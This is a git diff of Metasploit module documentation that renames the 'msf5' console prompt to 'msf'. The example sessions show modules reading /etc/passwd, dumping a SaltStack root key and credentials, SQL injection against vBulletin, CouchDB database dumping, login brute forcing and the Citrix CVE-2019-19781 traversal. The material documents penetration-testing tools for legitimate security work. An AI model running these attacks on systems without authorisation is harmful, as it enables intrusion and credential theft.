b/documentation/modules/auxiliary/gather/rails_doubletap_file_read.md index 5a4c490d07..9cf7daf612 100644 --- a/documentation/modules/auxiliary/gather/rails_doubletap_file_read.md +++ b/documentation/modules/auxiliary/gather/rails_doubletap_file_read.md @@ -38,8 +38,8 @@ ``` -msf5 > use auxiliary/gather/rails_doubletap_file_read -msf5 auxiliary(gather/rails_doubletap_file_read) > options +msf > use auxiliary/gather/rails_doubletap_file_read +msf auxiliary(gather/rails_doubletap_file_read) > options Module options (auxiliary/gather/rails_doubletap_file_read): @@ -53,13 +53,13 @@ Module options (auxiliary/gather/rails_doubletap_file_read): TARGET_FILE /etc/passwd yes The absolute path of remote file to read. VHOST no HTTP server virtual host -msf5 auxiliary(gather/rails_doubletap_file_read) > set RHOSTS localhost +msf auxiliary(gather/rails_doubletap_file_read) > set RHOSTS localhost RHOSTS => localhost -msf5 auxiliary(gather/rails_doubletap_file_read) > set RPORT 8000 +msf auxiliary(gather/rails_doubletap_file_read) > set RPORT 8000 RPORT => 8000 -smsf5 auxiliary(gather/rails_doubletap_file_read) > set ROUTE /demo +smsf auxiliary(gather/rails_doubletap_file_read) > set ROUTE /demo ROUTE => /demo -msf5 auxiliary(gather/rails_doubletap_file_read) > run +msf auxiliary(gather/rails_doubletap_file_read) > run [*] Running module against 127.0.0.1 [+] Target is vulnerable! diff --git a/documentation/modules/auxiliary/gather/saltstack_salt_root_key.md b/documentation/modules/auxiliary/gather/saltstack_salt_root_key.md index c0abe112aa..83f3994a9c 100644 --- a/documentation/modules/auxiliary/gather/saltstack_salt_root_key.md +++ b/documentation/modules/auxiliary/gather/saltstack_salt_root_key.md @@ -74,8 +74,8 @@ method and extracting the key from the resulting serialized auth info. ### SaltStack Salt 2019.2.3 on Ubuntu 18.04 ``` -msf5 > use auxiliary/gather/saltstack_salt_root_key -msf5 auxiliary(gather/saltstack_salt_root_key) > options +msf > use auxiliary/gather/saltstack_salt_root_key +msf auxiliary(gather/saltstack_salt_root_key) > options Module options (auxiliary/gather/saltstack_salt_root_key): @@ -92,9 +92,9 @@ Auxiliary action: Dump Dump root key from Salt master -msf5 auxiliary(gather/saltstack_salt_root_key) > set rhosts 172.28.128.5 +msf auxiliary(gather/saltstack_salt_root_key) > set rhosts 172.28.128.5 rhosts => 172.28.128.5 -msf5 auxiliary(gather/saltstack_salt_root_key) > run +msf auxiliary(gather/saltstack_salt_root_key) > run [*] Running module against 172.28.128.5 [*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506 @@ -114,7 +114,7 @@ msf5 auxiliary(gather/saltstack_salt_root_key) > run [+] 172.28.128.5:4506 - Root key: bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk= [*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506 [*] Auxiliary module execution completed -msf5 auxiliary(gather/saltstack_salt_root_key) > creds +msf auxiliary(gather/saltstack_salt_root_key) > creds Credentials =========== @@ -122,5 +122,5 @@ host origin service public private ---- ------ ------- ------ ------- ----- ------------ ---------- 172.28.128.5 172.28.128.5 4506/tcp (salt/zeromq) root bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk= Password -msf5 auxiliary(gather/saltstack_salt_root_key) > +msf auxiliary(gather/saltstack_salt_root_key) > ``` diff --git a/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md b/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md index 639d3a163c..1a06d02a88 100644 --- a/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md +++ b/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md @@ -59,13 +59,13 @@ The base URI path of vBulletin. **Default: /** ## Scenarios ``` -msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set RHOSTS 192.168.1.100 +msf auxiliary(gather/vbulletin_getindexablecontent_sqli) > set RHOSTS 192.168.1.100 RHOSTS => 192.168.1.100 -msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set VHOST vb.local +msf auxiliary(gather/vbulletin_getindexablecontent_sqli) > set VHOST vb.local VHOST => vb.local -msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set TARGETURI / +msf auxiliary(gather/vbulletin_getindexablecontent_sqli) > set TARGETURI / TARGETURI => /vb5 -msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > show actions +msf auxiliary(gather/vbulletin_getindexablecontent_sqli) > show actions Auxiliary actions: @@ -74,7 +74,7 @@ Auxiliary actions: DumpAll Dump all tables used by vbulletin. DumpUser Dump only user table used by vbulletin. -msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > run +msf auxiliary(gather/vbulletin_getindexablecontent_sqli) > run [*] Running module against 192.168.1.100 [*] Brute forcing to find a valid node id. diff --git a/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md b/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md index 8f73c25980..1b32eaef29 100644 --- a/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md +++ b/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md @@ -74,9 +74,9 @@ Auxiliary action: View the full module info with the info, or info -d command. -msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > set rhosts [redacted] +msf auxiliary(gather/vmware_vcenter_vmdir_ldap) > set rhosts [redacted] rhosts => [redacted] -msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > run +msf auxiliary(gather/vmware_vcenter_vmdir_ldap) > run [*] Running module against [redacted] not verifying SSL hostname of LDAPS server '[redacted]:636' @@ -115,5 +115,5 @@ vmwpasswordprohibitedpreviouscount: [redacted] [+] Credentials found: [redacted] [snip] [*] Auxiliary module execution completed -msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > +msf auxiliary(gather/vmware_vcenter_vmdir_ldap) > ``` diff --git a/documentation/modules/auxiliary/gather/xymon_info.md b/documentation/modules/auxiliary/gather/xymon_info.md index 75f7c870ff..e595c28f22 100644 --- a/documentation/modules/auxiliary/gather/xymon_info.md +++ b/documentation/modules/auxiliary/gather/xymon_info.md @@ -48,10 +48,10 @@ ## Scenarios ``` - msf5 > use auxiliary/gather/xymon_info - msf5 auxiliary(gather/xymon_info) > set rhosts 172.16.191.250 + msf > use auxiliary/gather/xymon_info + msf auxiliary(gather/xymon_info) > set rhosts 172.16.191.250 rhosts => 172.16.191.250 - msf5 auxiliary(gather/xymon_info) > run + msf auxiliary(gather/xymon_info) > run [*] Running module against 172.16.191.250 [*] 172.16.191.250:1984 - Xymon daemon version 4.3.28 @@ -68,7 +68,7 @@ [*] 172.16.191.250:1984 - test-host client log is empty [*] 172.16.191.250:1984 - another-test-host client log is empty [*] Auxiliary module execution completed - msf5 auxiliary(gather/xymon_info) > creds + msf auxiliary(gather/xymon_info) > creds Credentials =========== diff --git a/documentation/modules/auxiliary/gather/zookeeper_info_disclosure.md b/documentation/modules/auxiliary/gather/zookeeper_info_disclosure.md index 8680d11233..b787bdbde8 100644 --- a/documentation/modules/auxiliary/gather/zookeeper_info_disclosure.md +++ b/documentation/modules/auxiliary/gather/zookeeper_info_disclosure.md @@ -5,9 +5,9 @@ This module targets Apache ZooKeeper service instances to extract information ab ### Verification Steps ``` -msf5 > use auxiliary/gather/zookeeper_info_disclosure -msf5 auxiliary(gather/zookeeper_info_disclosure) > set rhosts 1.3.3.7 -msf5 auxiliary(gather/zookeeper_info_disclosure) > show options +msf > use auxiliary/gather/zookeeper_info_disclosure +msf auxiliary(gather/zookeeper_info_disclosure) > set rhosts 1.3.3.7 +msf auxiliary(gather/zookeeper_info_disclosure) > show options Name: Apache ZooKeeper Information Disclosure Module: auxiliary/gather/zookeeper_info_disclosure @@ -39,7 +39,7 @@ References: https://zookeeper.apache.org/doc/current/zookeeperAdmin.html -msf5 auxiliary(gather/zookeeper_info_disclosure) > run +msf auxiliary(gather/zookeeper_info_disclosure) > run [*] 1.3.3.7:2181 - Using a timeout of 30... [*] 1.3.3.7:2181 - Verifying if service is responsive... @@ -90,8 +90,8 @@ Node count: 1041 [*] Auxiliary module execution completed -msf5 auxiliary(gather/zookeeper_info_disclosure) > -msf5 auxiliary(gather/zookeeper_info_disclosure) > loot +msf auxiliary(gather/zookeeper_info_disclosure) > +msf auxiliary(gather/zookeeper_info_disclosure) > loot Loot ==== @@ -102,7 +102,7 @@ host service type name content info 1.3.3.7 stat-log ZooKeeper Stat Log text/plain ZooKeeper /root/.msf4/loot/20201013203537_default_1.3.3.7_statlog_417795.txt -msf5 auxiliary(gather/zookeeper_info_disclosure) > services +msf auxiliary(gather/zookeeper_info_disclosure) > services Services ======== @@ -110,7 +110,7 @@ host port proto name state info ---- ---- ----- ---- ----- ---- 1.3.3.7 2181 tcp zookeeper open Apache Zookeeper: 3.4.13-2--1 -msf5 auxiliary(gather/zookeeper_info_disclosure) > hosts +msf auxiliary(gather/zookeeper_info_disclosure) > hosts Hosts ===== diff --git a/documentation/modules/auxiliary/scanner/afp/afp_server_info.md b/documentation/modules/auxiliary/scanner/afp/afp_server_info.md index bdc2b74f9d..bab00d03aa 100644 --- a/documentation/modules/auxiliary/scanner/afp/afp_server_info.md +++ b/documentation/modules/auxiliary/scanner/afp/afp_server_info.md @@ -32,10 +32,10 @@ The following was done on Ubuntu 16.04, and is largely based on [missingreadme.w ### Ubuntu 16.04 with Netatalk 2.2.5 ``` - msf5 auxiliary(scanner/acpp/login) > use auxiliary/scanner/afp/afp_server_info - msf5 auxiliary(scanner/afp/afp_server_info) > set rhosts 1.1.1.1 + msf auxiliary(scanner/acpp/login) > use auxiliary/scanner/afp/afp_server_info + msf auxiliary(scanner/afp/afp_server_info) > set rhosts 1.1.1.1 rhosts => 1.1.1.1 - msf5 auxiliary(scanner/afp/afp_server_info) > run + msf auxiliary(scanner/afp/afp_server_info) > run [*] 1.1.1.1:548 - AFP 1.1.1.1 Scanning... [*] 1.1.1.1:548 - AFP 1.1.1.1:548:548 AFP: diff --git a/documentation/modules/auxiliary/scanner/couchdb/couchdb_enum.md b/documentation/modules/auxiliary/scanner/couchdb/couchdb_enum.md index 6a76dc4f9f..9bec15a26c 100644 --- a/documentation/modules/auxiliary/scanner/couchdb/couchdb_enum.md +++ b/documentation/modules/auxiliary/scanner/couchdb/couchdb_enum.md @@ -33,8 +33,8 @@ The following was done on Ubuntu 16.04, and is largely base on [1and1.com](https Dumping databases with `SERVERINFO` and `CREATEUSER` set: ``` -msf5 > use auxiliary/scanner/couchdb/couchdb_enum -msf5 auxiliary(scanner/couchdb/couchdb_enum) > options +msf > use auxiliary/scanner/couchdb/couchdb_enum +msf auxiliary(scanner/couchdb/couchdb_enum) > options Module options (auxiliary/scanner/couchdb/couchdb_enum): @@ -52,19 +52,19 @@ Module options (auxiliary/scanner/couchdb/couchdb_enum): TARGETURI /_all_dbs yes Path to list all the databases VHOST no HTTP server virtual host -msf5 auxiliary(scanner/couchdb/couchdb_enum) > set rhosts 127.0.0.1 +msf auxiliary(scanner/couchdb/couchdb_enum) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(scanner/couchdb/couchdb_enum) > set serverinfo true +msf auxiliary(scanner/couchdb/couchdb_enum) > set serverinfo true serverinfo => true -msf5 auxiliary(scanner/couchdb/couchdb_enum) > set createuser true +msf auxiliary(scanner/couchdb/couchdb_enum) > set createuser true createuser => true -msf5 auxiliary(scanner/couchdb/couchdb_enum) > set verbose true +msf auxiliary(scanner/couchdb/couchdb_enum) > set verbose true verbose => true -msf5 auxiliary(scanner/couchdb/couchdb_enum) > check +msf auxiliary(scanner/couchdb/couchdb_enum) > check [+] 127.0.0.1:5984 - Found CouchDB version 2.1.0 [*] 127.0.0.1:5984 - The target appears to be vulnerable. -msf5 auxiliary(scanner/couchdb/couchdb_enum) > run +msf auxiliary(scanner/couchdb/couchdb_enum) > run [+] 127.0.0.1:5984 - Found CouchDB version 2.1.0 [+] 127.0.0.1:5984 - User CQuXQnVwQAow created with password IJvoGDWAWzQo. Connect to http://127.0.0.1:5984/_utils/ to login. @@ -92,5 +92,5 @@ msf5 auxiliary(scanner/couchdb/couchdb_enum) > run [+] 127.0.0.1:5984 - _replicator saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._replica_022445.bin [+] 127.0.0.1:5984 - _users saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._users_671128.bin [*] Auxiliary module execution completed -msf5 auxiliary(scanner/couchdb/couchdb_enum) > +msf auxiliary(scanner/couchdb/couchdb_enum) > ``` diff --git a/documentation/modules/auxiliary/scanner/couchdb/couchdb_login.md b/documentation/modules/auxiliary/scanner/couchdb/couchdb_login.md index ce4d9c8f3e..fd03cb1a6f 100644 --- a/documentation/modules/auxiliary/scanner/couchdb/couchdb_login.md +++ b/documentation/modules/auxiliary/scanner/couchdb/couchdb_login.md @@ -52,14 +52,14 @@ The following was done on Ubuntu 16.04, and is largely based on [1and1.com](http A run against the configuration from these docs ``` - msf5 > use auxiliary/scanner/couchdb/couchdb_login - msf5 auxiliary(scanner/couchdb/couchdb_login) > set rhosts 1.1.1.1 + msf > use auxiliary/scanner/couchdb/couchdb_login + msf auxiliary(scanner/couchdb/couchdb_login) > set rhosts 1.1.1.1 rhosts => 1.1.1.1 - msf5 auxiliary(scanner/couchdb/couchdb_login) > set username anna + msf auxiliary(scanner/couchdb/couchdb_login) > set username anna username => anna - msf5 auxiliary(scanner/couchdb/couchdb_login) > set password secret + msf auxiliary(scanner/couchdb/couchdb_login) > set password secret password => secret - msf5 auxiliary(scanner/couchdb/couchdb_login) > run + msf auxiliary(scanner/couchdb/couchdb_login) > run [*] 1.1.1.1:5984 - [001/305] - Trying username:'connect' with password:'connect' [*] 1.1.1.1:5984 - [002/305] - Trying username:'sitecom' with password:'sitecom' diff --git a/documentation/modules/auxiliary/scanner/dcerpc/windows_deployment_services.md b/documentation/modules/auxiliary/scanner/dcerpc/windows_deployment_services.md index a342b1958b..01b1adfda2 100644 --- a/documentation/modules/auxiliary/scanner/dcerpc/windows_deployment_services.md +++ b/documentation/modules/auxiliary/scanner/dcerpc/windows_deployment_services.md @@ -24,7 +24,7 @@ More information can be found on the [Rapid7 Vulnerability & Exploit Database pa [*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040] ... [+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040] [*] Sending X64 Client Unattend request ... - [*] Raw version of X64 saved as: C:/Documents and Settings/user/.msf5/loot/20121213104745_default_192.168.5.1_windows.unattend_399005.txt + [*] Raw version of X64 saved as: C:/Documents and Settings/user/.msf/loot/20121213104745_default_192.168.5.1_windows.unattend_399005.txt [+] Retrieved wds credentials for X64 [*] Sending X86 Client Unattend request ... [*] Sending IA64 Client Unattend request ... diff --git a/documentation/modules/auxiliary/scanner/etcd/open_key_scanner.md b/documentation/modules/auxiliary/scanner/etcd/open_key_scanner.md index 2bf496627f..8801a9b189 100644 --- a/documentation/modules/auxiliary/scanner/etcd/open_key_scanner.md +++ b/documentation/modules/auxiliary/scanner/etcd/open_key_scanner.md @@ -29,10 +29,10 @@ unauthenticated users access to the data stored via HTTP API. ### etcd 3.2.15 on CentOS 7.1 ``` -msf5 > use auxiliary/scanner/etcd/open_key_scanner -msf5 auxiliary(scanner/etcd/open_key_scanner) > set rhosts 2.2.2.2 +msf > use auxiliary/scanner/etcd/open_key_scanner +msf auxiliary(scanner/etcd/open_key_scanner) > set rhosts 2.2.2.2 rhosts => 2.2.2.2 -msf5 auxiliary(scanner/etcd/open_key_scanner) > run +msf auxiliary(scanner/etcd/open_key_scanner) > run [+] 2.2.2.2:2379 Version: {"etcdserver":"3.2.15","etcdcluster":"3.2.0"} @@ -58,7 +58,7 @@ host service type name content info path ---- ------- ---- ---- ------- ---- ---- 2.2.2.2 etcd.data etcd.keys text/plain etcd keys /root/.msf4/loot/20180325144351_default_2.2.2.2_etcd.data_425280.txt -msf5 auxiliary(scanner/etcd/open_key_scanner) > services +msf auxiliary(scanner/etcd/open_key_scanner) > services Services ======== @@ -70,10 +70,10 @@ host port proto name state info ### etcd in Docker ``` -msf5 > use auxiliary/scanner/etcd/open_key_scanner -msf5 auxiliary(scanner/etcd/open_key_scanner) > set RHOSTS 127.0.0.1 +msf > use auxiliary/scanner/etcd/open_key_scanner +msf auxiliary(scanner/etcd/open_key_scanner) > set RHOSTS 127.0.0.1 RHOSTS => 127.0.0.1 -msf5 auxiliary(scanner/etcd/open_key_scanner) > run +msf auxiliary(scanner/etcd/open_key_scanner) > run [+] 127.0.0.1:2379 Version: {"etcdserver":"3.1.3","etcdcluster":"3.1.0"} @@ -85,7 +85,7 @@ Data: { } [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/etcd/open_key_scanner) > loot +msf auxiliary(scanner/etcd/open_key_scanner) > loot Loot ==== @@ -94,7 +94,7 @@ host service type name content info path ---- ------- ---- ---- ------- ---- ---- 127.0.0.1 etcd.data etcd.keys text/json etcd keys /root/.msf4/loot/20180328092245_default_127.0.0.1_etcd.data_260058.txt -msf5 auxiliary(scanner/etcd/open_key_scanner) > services +msf auxiliary(scanner/etcd/open_key_scanner) > services Services ======== diff --git a/documentation/modules/auxiliary/scanner/etcd/version.md b/documentation/modules/auxiliary/scanner/etcd/version.md index 13b42f78d3..8cd856c768 100644 --- a/documentation/modules/auxiliary/scanner/etcd/version.md +++ b/documentation/modules/auxiliary/scanner/etcd/version.md @@ -20,15 +20,15 @@ etcd is a distributed reliable key-value store. It exposes and API from which y ### etcd in Docker ``` -msf5 > use auxiliary/scanner/etcd/version -msf5 auxiliary(scanner/etcd/version) > set RHOSTS localhost +msf > use auxiliary/scanner/etcd/version +msf auxiliary(scanner/etcd/version) > set RHOSTS localhost RHOSTS => localhost -msf5 auxiliary(scanner/etcd/version) > run +msf auxiliary(scanner/etcd/version) > run [+] 127.0.0.1:2379 : {"etcdserver"=>"3.1.3", "etcdcluster"=>"3.1.0"} [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/etcd/version) > services +msf auxiliary(scanner/etcd/version) > services Services ======== diff --git a/documentation/modules/auxiliary/scanner/h323/h323_version.md b/documentation/modules/auxiliary/scanner/h323/h323_version.md index 0ec269de39..24634789ea 100644 --- a/documentation/modules/auxiliary/scanner/h323/h323_version.md +++ b/documentation/modules/auxiliary/scanner/h323/h323_version.md @@ -5,10 +5,10 @@ This module scans for h.323 servers and determines the version and information a ## Usage ``` -msf5 auxiliary(scanner/sip/options) > use auxiliary/scanner/h323/h323_version -msf5 auxiliary(scanner/h323/h323_version) > set rhosts 1.1.1.1 +msf auxiliary(scanner/sip/options) > use auxiliary/scanner/h323/h323_version +msf auxiliary(scanner/h323/h323_version) > set rhosts 1.1.1.1 rhosts => 1.1.1.1 -msf5 auxiliary(scanner/h323/h323_version) > run +msf auxiliary(scanner/h323/h323_version) > run [+] 1.1.1.1:1720 - 1.1.1.1:1720 Protocol: 3 VendorID: 0x6100023c VersionID: v.5.4 ProductID: Gateway [*] 1.1.1.1:1720 - Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.md b/documentation/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.md index dcce136196..08b3d64dc4 100644 --- a/documentation/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.md +++ b/documentation/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.md @@ -95,12 +95,12 @@ This is HTTP method used by the module. The default setting is `GET`. ### Ubuntu 12.04.5 LTS on Apache 2.2.22 ``` -msf5 > use auxiliary/scanner/http/apache_mod_cgi_bash_env -msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set RHOSTS 172.16.131.134 +msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env +msf auxiliary(scanner/http/apache_mod_cgi_bash_env) > set RHOSTS 172.16.131.134 RHOSTS => 172.16.131.134 -msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/test.sh +msf auxiliary(scanner/http/apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/test.sh TARGETURI => /cgi-bin/test.sh -msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit +msf auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit [+] uid=33(www-data) gid=33(www-data) groups=33(www-data) [*] Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/http/apache_userdir_enum.md b/documentation/modules/auxiliary/scanner/http/apache_userdir_enum.md index 419844f476..5d7b6d101b 100644 --- a/documentation/modules/auxiliary/scanner/http/apache_userdir_enum.md +++ b/documentation/modules/auxiliary/scanner/http/apache_userdir_enum.md @@ -22,10 +22,10 @@ that exist but have no `public_html` directory. ![apache_userdir_enum Demo](https://i.imgur.com/UZanfTI.gif) ``` -msf5 > use auxiliary/scanner/http/apache_userdir_enum -msf5 auxiliary(scanner/http/apache_userdir_enum) > set rhosts alderaan +msf > use auxiliary/scanner/http/apache_userdir_enum +msf auxiliary(scanner/http/apache_userdir_enum) > set rhosts alderaan rhosts => alderaan -msf5 auxiliary(scanner/http/apache_userdir_enum) > run +msf auxiliary(scanner/http/apache_userdir_enum) > run [*] http://192.168.6.172/~ - Trying UserDir: '' [*] http://192.168.6.172/ - Apache UserDir: '' not found diff --git a/documentation/modules/auxiliary/scanner/http/backup_file.md b/documentation/modules/auxiliary/scanner/http/backup_file.md index 0727434f86..a6d0d9ea79 100644 --- a/documentation/modules/auxiliary/scanner/http/backup_file.md +++ b/documentation/modules/auxiliary/scanner/http/backup_file.md @@ -20,14 +20,14 @@ In this scenario, we look for `/backup` instead. On the web server, we've creat `backup.orig`, and `backup~`. ``` -msf5 > use auxiliary/scanner/http/backup_file -msf5 auxiliary(scanner/http/backup_file) > set verbose true +msf > use auxiliary/scanner/http/backup_file +msf auxiliary(scanner/http/backup_file) > set verbose true verbose => true -msf5 auxiliary(scanner/http/backup_file) > set path /backup +msf auxiliary(scanner/http/backup_file) > set path /backup path => /backup -msf5 auxiliary(scanner/http/backup_file) > set rhosts 192.168.2.39 +msf auxiliary(scanner/http/backup_file) > set rhosts 192.168.2.39 rhosts => 192.168.2.39 -msf5 auxiliary(scanner/http/backup_file) > run +msf auxiliary(scanner/http/backup_file) > run [*] NOT Found http://192.168.2.39:80/backup.backup [*] NOT Found http://192.168.2.39:80/backup.bak diff --git a/documentation/modules/auxiliary/scanner/http/brute_dirs.md b/documentation/modules/auxiliary/scanner/http/brute_dirs.md index e140ad3718..f728417c0e 100644 --- a/documentation/modules/auxiliary/scanner/http/brute_dirs.md +++ b/documentation/modules/auxiliary/scanner/http/brute_dirs.md @@ -93,11 +93,11 @@ PORT STATE SERVICE Configure the `brute_dirs` module to use the identified IP address and port number: ``` -msf5 > use auxiliary/scanner/http/brute_dirs -msf5 auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.2.3 -msf5 auxiliary(scanner/http/brute_dirs) > set RPORT 8080 +msf > use auxiliary/scanner/http/brute_dirs +msf auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.2.3 +msf auxiliary(scanner/http/brute_dirs) > set RPORT 8080 RHOSTS => 192.168.2.3 -msf5 auxiliary(scanner/http/brute_dirs) > run +msf auxiliary(scanner/http/brute_dirs) > run [*] Using code '404' as not found. [+] Found http://192.168.2.3:8080/dav/ 200 @@ -109,11 +109,11 @@ msf5 auxiliary(scanner/http/brute_dirs) > run ### Testing against multiple hosts using a CIDR ``` -msf5 > use auxiliary/scanner/http/brute_dirs -msf5 auxiliary(scanner/http/brute_dirs) > show options +msf > use auxiliary/scanner/http/brute_dirs +msf auxiliary(scanner/http/brute_dirs) > show options ... show and set options ... -msf5 auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.2.1/24 -msf5 auxiliary(scanner/http/brute_dirs) > run +msf auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.2.1/24 +msf auxiliary(scanner/http/brute_dirs) > run ``` ### Custom format to find specifically formatted directories @@ -122,8 +122,8 @@ A format string of `Aaaaad` will search for 6 character directories, starting wi digit. E.g. ``` -msf5 > use auxiliary/scanner/http/brute_dirs -msf5 auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.2.3 -msf5 auxiliary(scanner/http/brute_dirs) > set FORMAT 'Aaaaad' -msf5 auxiliary(scanner/http/brute_dirs) > run +msf > use auxiliary/scanner/http/brute_dirs +msf auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.2.3 +msf auxiliary(scanner/http/brute_dirs) > set FORMAT 'Aaaaad' +msf auxiliary(scanner/http/brute_dirs) > run ``` diff --git a/documentation/modules/auxiliary/scanner/http/cgit_traversal.md b/documentation/modules/auxiliary/scanner/http/cgit_traversal.md index ca2896fc57..e6db7f5b1c 100644 --- a/documentation/modules/auxiliary/scanner/http/cgit_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/cgit_traversal.md @@ -69,18 +69,18 @@ Git repository on the remote server. Default is empty, `''`. ### Ubuntu 18.04 x64, cgit | 1.1+git2.10.2-3build1 ``` -msf5 > use auxiliary/scanner/http/cgit_traversal -msf5 auxiliary(scanner/http/cgit_traversal) > set rhosts 172.22.222.123 +msf > use auxiliary/scanner/http/cgit_traversal +msf auxiliary(scanner/http/cgit_traversal) > set rhosts 172.22.222.123 rhosts => 172.22.222.123 -msf5 auxiliary(scanner/http/cgit_traversal) > set targeturi /mygit/ +msf auxiliary(scanner/http/cgit_traversal) > set targeturi /mygit/ targeturi => /mygit/ -msf5 auxiliary(scanner/http/cgit_traversal) > set repo test +msf auxiliary(scanner/http/cgit_traversal) > set repo test repo => test -msf5 auxiliary(scanner/http/cgit_traversal) > set filepath /home/msfdev/proof.txt +msf auxiliary(scanner/http/cgit_traversal) > set filepath /home/msfdev/proof.txt filepath => /home/msfdev/proof.txt -msf5 auxiliary(scanner/http/cgit_traversal) > set verbose true +msf auxiliary(scanner/http/cgit_traversal) > set verbose true verbose => true -msf5 auxiliary(scanner/http/cgit_traversal) > run +msf auxiliary(scanner/http/cgit_traversal) > run [+] 172.22.222.123:80 - you found me! diff --git a/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md b/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md index a102171128..e80d526a85 100644 --- a/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md +++ b/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md @@ -29,12 +29,12 @@ ### Tested on Cisco UC520-8U-4FXO-K9 running IOS 12.4 ``` - msf5 > use auxiliary/scanner/http/cisco_device_manager - msf5 auxiliary(scanner/http/cisco_device_manager) > set rhosts 2.2.2.2 + msf > use auxiliary/scanner/http/cisco_device_manager + msf auxiliary(scanner/http/cisco_device_manager) > set rhosts 2.2.2.2 rhosts => 2.2.2.2 - msf5 auxiliary(scanner/http/cisco_device_manager) > set vebose true + msf auxiliary(scanner/http/cisco_device_manager) > set vebose true vebose => true - msf5 auxiliary(scanner/http/cisco_device_manager) > run + msf auxiliary(scanner/http/cisco_device_manager) > run [+] 2.2.2.2:80 Successfully authenticated to this device [+] 2.2.2.2:80 Processing the configuration file... diff --git a/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md b/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md index 02e705d8e3..268137147f 100644 --- a/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md @@ -21,10 +21,10 @@ ``` - msf5 > use auxiliary/scanner/http/cisco_directory_traversal - msf5 auxiliary(scanner/http/cisco_directory_traversal) > set rhosts 192.168.1.1 + msf > use auxiliary/scanner/http/cisco_directory_traversal + msf auxiliary(scanner/http/cisco_directory_traversal) > set rhosts 192.168.1.1 rhosts => 192.168.1.1 - msf5 auxiliary(scanner/http/cisco_directory_traversal) > run + msf auxiliary(scanner/http/cisco_directory_traversal) > run [+] /// [ diff --git a/documentation/modules/auxiliary/scanner/http/citrix_dir_traversal.md b/documentation/modules/auxiliary/scanner/http/citrix_dir_traversal.md index e5248520f3..1a41ab8a8e 100644 --- a/documentation/modules/auxiliary/scanner/http/citrix_dir_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/citrix_dir_traversal.md @@ -27,7 +27,7 @@ This module checks if a target server is vulnerable by issuing an HTTP GET reque ## Scenarios ``` -msf5 auxiliary(scanner/http/citrix_dir_traversal) > options +msf auxiliary(scanner/http/citrix_dir_traversal) > options Module options (auxiliary/scanner/http/citrix_dir_traversal): @@ -42,13 +42,13 @@ Module options (auxiliary/scanner/http/citrix_dir_traversal): THREADS 1 yes The number of concurrent threads (max one per host) VHOST no HTTP server virtual host -msf5 auxiliary(scanner/http/citrix_dir_traversal) > run +msf auxiliary(scanner/http/citrix_dir_traversal) > run [+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781. [+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal. [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/citrix_dir_traversal) > +msf 